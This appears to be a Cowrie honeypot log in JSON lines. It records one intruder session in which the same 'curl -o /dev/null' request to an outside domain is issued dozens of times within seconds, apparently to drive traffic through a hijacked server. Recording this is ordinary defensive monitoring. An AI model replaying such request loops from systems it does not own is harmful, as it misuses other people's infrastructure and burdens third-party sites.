{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:56.673904Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:56.713641Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:56.714481Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:56.754911Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:56.756067Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:56.793025Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:56.793859Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:56.831530Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:56.832363Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:56.870434Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:56.871297Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:56.914302Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:56.915397Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:56.952070Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:56.952908Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.000067Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.000966Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.037771Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.038852Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.076735Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.077617Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.114443Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.115322Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.152295Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.153378Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.190105Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.191067Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.227581Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.228561Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.265261Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.266364Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.303719Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.304590Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.341396Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.342180Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.389219Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.390038Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.427167Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.427955Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.465056Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.465839Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.503170Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.503978Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.541728Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.542520Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.582047Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.582693Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.620991Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.621787Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.659434Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.660259Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.696542Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.697575Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.734985Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.735875Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.785278Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.786093Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.826082Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.827587Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.864742Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.865585Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.902200Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.903027Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.939805Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.940629Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:57.978037Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:57.979011Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.016372Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.017208Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.055925Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.056822Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.101577Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.102415Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.139202Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.140102Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.188505Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.189628Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.227724Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.228684Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.267390Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.268758Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.305624Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.306581Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.345529Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.346393Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.383502Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.384789Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.421200Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.422130Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.459351Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.460185Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.496585Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.497652Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.534183Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.535060Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.581425Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.582308Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.619379Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.620791Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.657889Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.658846Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.705297Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.706290Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.743386Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.745150Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.782459Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.783381Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.826701Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.827577Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.865418Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.866584Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.903416Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.904384Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.941615Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.942542Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:58.989373Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:58.990571Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:59.027937Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:59.028845Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:59.067616Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:59.068822Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:59.107808Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:59.108755Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:59.146266Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:59.147219Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:59.184382Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:59.185546Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:59.222831Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:59.223912Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:59.266028Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
